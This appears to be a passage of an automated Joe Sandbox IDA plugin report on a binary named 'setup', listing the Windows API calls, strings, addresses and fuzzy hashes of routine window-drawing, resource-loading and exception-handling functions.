                                                                                                                          • Instruction ID: 99a176a8e3dd91379f98e05ca2de15d3eb89082bcb0c6be435b0d3e553d2ea02
                                                                                                                          • Opcode Fuzzy Hash: c6bfa9430899e19b6bdad392c2f50b2531058efea5d5a0c93cb9e11343ecb488
                                                                                                                          • Instruction Fuzzy Hash: 9FD24B71E082298FDB65DE28CC447EAB7B5FB44309F1441EAD81EE7240E778AE819F45
                                                                                                                          APIs
                                                                                                                          • IsIconic.USER32(?), ref: 00C1C1E9
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • SendMessageW.USER32(?,00000027,?,00000000), ref: 00C1C208
                                                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 00C1C216
                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 00C1C21C
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C1C22E
                                                                                                                          • DrawIcon.USER32(?,?,?,?), ref: 00C1C25B
                                                                                                                            • Part of subcall function 00C2D187: EndPaint.USER32(?,?,4641B5ED,?,00000000,00C9219E,000000FF,?,00C38A02,?,?,00000058,00C1C274), ref: 00C2D1B9
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsPaintSystem$BeginClientDrawH_prolog3IconIconicMessageRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2989630354-0
                                                                                                                          • Opcode ID: b773db74d494283a2cb952f7d346879d907b52c7ee17b7f052ad22bede69141b
                                                                                                                          • Instruction ID: 4ee34f7d97281fe33f8c1cf9bad5f816465dd977f9a96759b5da4c4a6ec9eb5a
                                                                                                                          • Opcode Fuzzy Hash: b773db74d494283a2cb952f7d346879d907b52c7ee17b7f052ad22bede69141b
                                                                                                                          • Instruction Fuzzy Hash: C0115E31A00219AFCF00DFB8DD89BAE7BBAEF48310F150265F905EB1A5DA70A954DB50
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007B,00000104,00000104,?,?,?,?), ref: 00C3C9F0
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?), ref: 00C3C9FD
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00C3CA0B
                                                                                                                            • Part of subcall function 00C3CAC7: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000104), ref: 00C3CADE
                                                                                                                            • Part of subcall function 00C3CAC7: GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 00C3CAEE
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$AddressFileFindFirstHandleModuleProc
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 496933282-438819550
                                                                                                                          • Opcode ID: 7ed1411729e21c496a2b7b3c3e907c040f5668293ffed740573ac6762532831e
                                                                                                                          • Instruction ID: 2cc5c0434bf436374d3bbee941f227d64b726aaf3f150f0d767c812e8bd9eee1
                                                                                                                          • Opcode Fuzzy Hash: 7ed1411729e21c496a2b7b3c3e907c040f5668293ffed740573ac6762532831e
                                                                                                                          • Instruction Fuzzy Hash: 203138B2A1031877DB10BB759C86FAF726C9F85710F114229F512F71C2DE749A04E7A0
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000104), ref: 00C3CADE
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 00C3CAEE
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: FindFirstFileTransactedW$kernel32.dll
                                                                                                                          • API String ID: 1646373207-2878570079
                                                                                                                          • Opcode ID: 3f24cbfdb2c6d413bf704e20f236d0e1083bb117f9b7746e892b256752f3fbca
                                                                                                                          • Instruction ID: 2a63aa71b76dae3730e45d2b77a3e89404f9972a97d22d6792ac466451a1275f
                                                                                                                          • Opcode Fuzzy Hash: 3f24cbfdb2c6d413bf704e20f236d0e1083bb117f9b7746e892b256752f3fbca
                                                                                                                          • Instruction Fuzzy Hash: 92F01D32215605AFEB241B64EC8DB7EB7DCFB047A9F10413AB964E10E0CB718D50CB60
                                                                                                                          APIs
                                                                                                                          • GetFocus.USER32 ref: 00C12634
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00C1266D
                                                                                                                          • GetKeyState.USER32(00000010), ref: 00C12683
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,00000000,00000000,000000FF,000000FF), ref: 00C12880
                                                                                                                          Similarity
                                                                                                                          • API ID: State$FocusInvalidateRect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3352495673-0
                                                                                                                          • Opcode ID: 1b8f52e05ffb52ac7fb2ddeeb217d531ae30b78328af9c888a31cd0e1a32c70d
                                                                                                                          • Instruction ID: b6894c509163f5189fcde011cc63c17120d7e4a567ddceb83bc918241ccec7a3
                                                                                                                          • Opcode Fuzzy Hash: 1b8f52e05ffb52ac7fb2ddeeb217d531ae30b78328af9c888a31cd0e1a32c70d
                                                                                                                          • Instruction Fuzzy Hash: AB61A33E7040119BDA2CA728C498AFEB7A1AF8B310F190159F466972D1DB209DF1BBC1
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C1ACC4
                                                                                                                            • Part of subcall function 00C24DE6: __EH_prolog3.LIBCMT ref: 00C24DED
                                                                                                                            • Part of subcall function 00C24DE6: GetObjectW.GDI32(?,0000005C,?), ref: 00C24F22
                                                                                                                            • Part of subcall function 00C24DE6: GetObjectW.GDI32(?,0000005C,?), ref: 00C24F48
                                                                                                                            • Part of subcall function 00C24DE6: LoadLibraryW.KERNEL32(MSIMG32.DLL), ref: 00C24F57
                                                                                                                            • Part of subcall function 00C24DE6: GetProcAddress.KERNEL32(00000000,GradientFill), ref: 00C24F6D
                                                                                                                            • Part of subcall function 00C0FB2B: __EH_prolog3.LIBCMT ref: 00C0FB32
                                                                                                                            • Part of subcall function 00C0FB2B: InitializeCriticalSection.KERNEL32(?), ref: 00C0FC0B
                                                                                                                            • Part of subcall function 00C0FB2B: SystemParametersInfoW.USER32(00000068,00000000,?,00000000), ref: 00C0FC7D
                                                                                                                            • Part of subcall function 00C0FB2B: LoadCursorW.USER32(00000000,00007F01), ref: 00C0FCA9
                                                                                                                          • LoadIconW.USER32(?,00000080), ref: 00C1AE5A
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000E,?,00000002), ref: 00C1AEA8
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000002), ref: 00C1AEBA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3InfoLoad$LocaleObject$AddressCriticalCursorIconInitializeLibraryParametersProcSectionSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 858056783-0
                                                                                                                          • Opcode ID: 85fcbebd6e12da065a074f4059832b00cde12dcf4c437d996237af5eda886e62
                                                                                                                          • Instruction ID: 49316410400e7e089b6cdad5dcaba9b60a4927fae66fea3e78dbbe6e13c89fb1
                                                                                                                          • Opcode Fuzzy Hash: 85fcbebd6e12da065a074f4059832b00cde12dcf4c437d996237af5eda886e62
                                                                                                                          • Instruction Fuzzy Hash: 5D515B70915350AEDB44DF68C88579A7BE4EF08700F1441BAED4CDF2A6DBB49A41CFA2
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C38F6F
                                                                                                                            • Part of subcall function 00C3A35B: __EH_prolog3.LIBCMT ref: 00C3A362
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00C38FCE
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C38FD7
                                                                                                                          • GetVersionExW.KERNEL32 ref: 00C39073
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_Version
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 786120064-0
                                                                                                                          • Opcode ID: 1b2829549d5cd4d08a4b81e4f8330ee63b3a4b9cb4c73b4d20c6217113c4498e
                                                                                                                          • Instruction ID: 2dbe6c9cd32fe625dc92aa07c45348583701b4fd45e3ee81e7f0e2f7d1cd1fcf
                                                                                                                          • Opcode Fuzzy Hash: 1b2829549d5cd4d08a4b81e4f8330ee63b3a4b9cb4c73b4d20c6217113c4498e
                                                                                                                          • Instruction Fuzzy Hash: 4441BAB0911B048FD7619F6A898478AFAF1BF48700F908A6EE1AE87711DB70A944CF45
                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C47B3D
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00C47C09
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C47C22
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00C47C2C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 254469556-0
                                                                                                                          • Opcode ID: 2dc4d127debc6d6e88f2e9a7e3503357edac6b5de471f01afd2779053da014c3
                                                                                                                          • Instruction ID: d82891e3ee9b4a77f88b8a72a70e7a3a2f359f42bd2cd03c921e43446e9722ee
                                                                                                                          • Opcode Fuzzy Hash: 2dc4d127debc6d6e88f2e9a7e3503357edac6b5de471f01afd2779053da014c3
                                                                                                                          • Instruction Fuzzy Hash: A931F675D052189BDB21EFA4D9897CDBBB8BF08300F1041AAE40DAB290EB719B849F45
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • GetKeyState.USER32(00000010), ref: 00C31436
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00C31443
                                                                                                                          • GetKeyState.USER32(00000012), ref: 00C31450
                                                                                                                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00C3146A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1063413437-0
                                                                                                                          • Opcode ID: 02b0c8f7f3e54d09d56e000adbf585b4136e8a5be8f2214c5de5c3485fa7baef
                                                                                                                          • Instruction ID: be3ded3815c59e510a2974e0e4c073a494cc90883ac4b01b1eca818633b79b5a
                                                                                                                          • Opcode Fuzzy Hash: 02b0c8f7f3e54d09d56e000adbf585b4136e8a5be8f2214c5de5c3485fa7baef
                                                                                                                          • Instruction Fuzzy Hash: 9BF0A7353A02663FDA343F319C0DBAD65285F44B44F490535BAD2EE0D1DEA089415960
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #%d$#x%X$invalid entity type found$nbktext
                                                                                                                          • API String ID: 0-3606178694
                                                                                                                          • Opcode ID: 31aaa02036fcca9b56bbd2026a2a6282bb1a1da781eab375152d8d65c9ce644e
                                                                                                                          • Instruction ID: 9fa10fd44164e615cf4420669efcce3978d31fbf92698beff2f7ad0dca3a1787
                                                                                                                          • Opcode Fuzzy Hash: 31aaa02036fcca9b56bbd2026a2a6282bb1a1da781eab375152d8d65c9ce644e
                                                                                                                          • Instruction Fuzzy Hash: 2212E178904201DBDF21CF64E885B7AB7B5FF50312F14466EEC2A4B242E7319AC9CB95
                                                                                                                          APIs
                                                                                                                          • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,?,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CC24
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CC5B
                                                                                                                            • Part of subcall function 00C2CD2F: GetModuleFileNameW.KERNEL32(?,?,00000105,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDDF
                                                                                                                            • Part of subcall function 00C2CD2F: SetLastError.KERNEL32(0000006F,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDF3
                                                                                                                          Strings
                                                                                                                          • IsolationAware function called after IsolationAwareCleanup, xrefs: 00C2CC1F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$DebugFileModuleNameOutputString
                                                                                                                          • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                                                                          • API String ID: 3265401609-2690750368
                                                                                                                          • Opcode ID: cc7f72e5e9f34630d9e0920cb34ec327f6c6e9581f58d71d52687aa558ae5b98
                                                                                                                          • Instruction ID: 4c2ae64bcd01beb96ce74470dac4432432ca8756eddc8e156bad15b59dbcc116
                                                                                                                          • Opcode Fuzzy Hash: cc7f72e5e9f34630d9e0920cb34ec327f6c6e9581f58d71d52687aa558ae5b98
                                                                                                                          • Instruction Fuzzy Hash: 10F0C230240235865B385BB9FCC4B2E7648A70A750318063AFD2CC3921DB20CE50CAD1
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C27A8F: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00C480F9,?,?,?,00C0126F), ref: 00C27A95
                                                                                                                            • Part of subcall function 00C27A8F: GetLastError.KERNEL32(?,00C480F9,?,?,?,00C0126F), ref: 00C27A9F
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00C0126F), ref: 00C480FD
                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C0126F), ref: 00C4810C
                                                                                                                          Strings
                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C48107
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                          • API String ID: 3511171328-631824599
                                                                                                                          • Opcode ID: 6d7ddefcbcfba722492612756d35bbced41bf3640c22e54517dc4ec4bb4f3ef0
                                                                                                                          • Instruction ID: ad8d05b91b86445a0aa96daefd5bdbb44058038897c0752f7850ebc0fde60888
                                                                                                                          • Opcode Fuzzy Hash: 6d7ddefcbcfba722492612756d35bbced41bf3640c22e54517dc4ec4bb4f3ef0
                                                                                                                          • Instruction Fuzzy Hash: 82E092702007118BDB609F34E94975E7BE0BF04744F44892EE455C3690DBB4D889DB91
                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00C209EE
                                                                                                                          • CoCreateInstance.OLE32(00C9C2C0,00000000,00000001,00C9C280,?,?,?), ref: 00C20A08
                                                                                                                          • CoUninitialize.OLE32(?,?), ref: 00C20AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 948891078-0
                                                                                                                          • Opcode ID: f5cb987b8f24c46bdbf3438fafe0513e6bb57e652dc21902459b2f3d77544f4f
                                                                                                                          • Instruction ID: 88b46f40b746f384dae953d25f8639c20506117c4fb1e5312ba1f5116c72a381
                                                                                                                          • Opcode Fuzzy Hash: f5cb987b8f24c46bdbf3438fafe0513e6bb57e652dc21902459b2f3d77544f4f
                                                                                                                          • Instruction Fuzzy Hash: C5219171600229AFDB14DB64DC8DE9BBBBCEF44714F204199F509DB291DA70ED81CBA0
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C7126B
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C71275
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C71282
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: d1360c41a8cab371e6eac0acff0233b6549438616527ecd0d03108f8d584840f
                                                                                                                          • Instruction ID: b0600521edc12f044133461b73ebbff49cf189c25a411adc80115c1c00caead0
                                                                                                                          • Opcode Fuzzy Hash: d1360c41a8cab371e6eac0acff0233b6549438616527ecd0d03108f8d584840f
                                                                                                                          • Instruction Fuzzy Hash: 8931C5749112199BCB61DF68DC897DDBBB8BF18310F5042EAE41CA72A1E7709F858F44
                                                                                                                          APIs
                                                                                                                          • FindResourceW.KERNEL32(?,00000000,00000005), ref: 00C380F6
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00C38104
                                                                                                                          • LockResource.KERNEL32(?), ref: 00C38111
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2752051264-0
                                                                                                                          • Opcode ID: 5ce5a575c73e32e90f56e7f18d93dea05bfd061047f4c8d698d93db0d7f5fa2b
                                                                                                                          • Instruction ID: 348c99abe4ef93f5a76cfd196611332311e90052dc609a49dbb60093dd49fb1b
                                                                                                                          • Opcode Fuzzy Hash: 5ce5a575c73e32e90f56e7f18d93dea05bfd061047f4c8d698d93db0d7f5fa2b
                                                                                                                          • Instruction Fuzzy Hash: BD11AC312103109BDB209F20C809BABB7B5FB45B51F098479FC5597290EB71ED0AA760
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 431132790-0
                                                                                                                          • Opcode ID: 134cb45a680f4a0a2f593932e82a09646549267a2c5252bb2cf6ad0ad980d893
                                                                                                                          • Instruction ID: c30781d6fa6ff280fd0921f89e444dd36e08e0e86396053dac071be67ec20427
                                                                                                                          • Opcode Fuzzy Hash: 134cb45a680f4a0a2f593932e82a09646549267a2c5252bb2cf6ad0ad980d893
                                                                                                                          • Instruction Fuzzy Hash: 52E19A70A10219DFDF15DFA4D844BBEBBB5BF48314F188429E816AB291DB31EE41DB90
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C2A9FA: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00C2ABE9,00000002,00000000,00000000,?,?,?,00C2AD15,00000000,00000138,?), ref: 00C2AA2D
                                                                                                                          • _strcat.LIBCMT ref: 00C2B70A
                                                                                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00C2B7EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
